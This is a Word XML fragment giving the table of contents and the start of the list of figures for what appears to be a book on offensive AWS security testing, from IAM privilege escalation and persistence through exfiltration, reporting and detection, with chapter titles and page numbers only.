          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>xvii</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414143CE"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Part I  ·  Foundations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD2FAFE"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1  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>The AWS Threat Model and Shared Responsibility</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF3D536"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2  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch2" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>The AWS Attack Surface</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34476B09"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3  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Building an Offensive AWS Lab</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E1F9C2"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Part II  ·  Reconnaissance and Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223757E0"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4  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch4" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Unauthenticated Recon</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40330265"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5  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Authenticated Enumeration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEFA43F"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6  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Initial Access Vectors</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>81</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277CF0A3"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Part III  ·  IAM Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F28587B"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7  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>IAM Deep Dive for Attackers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D75A86"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8  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Privilege Escalation Techniques</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>117</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B899A0"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9  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Cross-Account Attacks and Role Chaining</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>137</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EA6BE2"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Part IV  ·  Service-Specific Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D39B85C"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10  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Compute — EC2, SSM, Lambda</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>155</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A62739E"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11  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Storage — S3, EBS, EFS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>175</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA5834"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12  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch12" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Data Services — RDS, DynamoDB, Redshift, Athena</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>191</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68169AA1"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13  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch13" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Containers and Kubernetes — ECS, EKS, Fargate</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>207</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4637073A"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14  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Serverless and Event-Driven</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>223</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481D15C2"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Part V  ·  Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED89D94"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15  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch15" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Persistence</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>239</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7721F208"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16  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch16" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Defense Evasion</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4F10BE"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17  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch17" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Data Exfiltration and Impact</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>271</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30424255"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Part VI  ·  Tradecraft and Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F793B6"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18  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch18" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>The Operator's Toolbox</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>287</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEAAF58"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19  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch19" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>CI/CD and Supply-Chain Attacks into AWS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>305</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6255911E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="chapter"/>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20  </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch20" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Reporting, Detection, and Remediation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AD170D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="part"/>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Appendices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1659F776" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="appendix"/>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w:t>
      </w:r>
      <w:hyperlink w:anchor="appA" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Command Cheat Sheets by Service</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>339</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14772404" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="appendix"/>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B  </w:t>
      </w:r>
      <w:hyperlink w:anchor="appB" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>IAM Privilege-Escalation Matrix</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>353</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AD5F22" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="appendix"/>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C  </w:t>
      </w:r>
      <w:hyperlink w:anchor="appC" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>MITRE ATT&amp;CK for Cloud — Mapping</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>361</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B275F3C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="appendix"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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D  </w:t>
      </w:r>
      <w:hyperlink w:anchor="appD" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>CloudTrail + Athena Detection Queries</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>371</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407D705E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="chapter"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="glossary" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Glossary</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>381</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274C8B62" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="chapter"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="bibliography" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Bibliography and References</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8C0226" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="chapter"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="index" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Index</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>395</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3B3397"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List of Figures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2636DBC8"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1.1  Shared-responsibility boundary by service class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219A5CC7"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1.2  Control-plane vs. data-plane attack surface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E5FEF5"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2.1  Entry-class taxonomy with representative incidents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4772CD7A"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2.2  STS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AssumeRole*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> family decision tree</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A419E4F"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3.1  Lab topology: management, victim, attacker OUs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62630022"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3.2  SCP and budget guardrails for safe detonation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B09047A"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4.1  Attack-surface mapping workflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="num"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
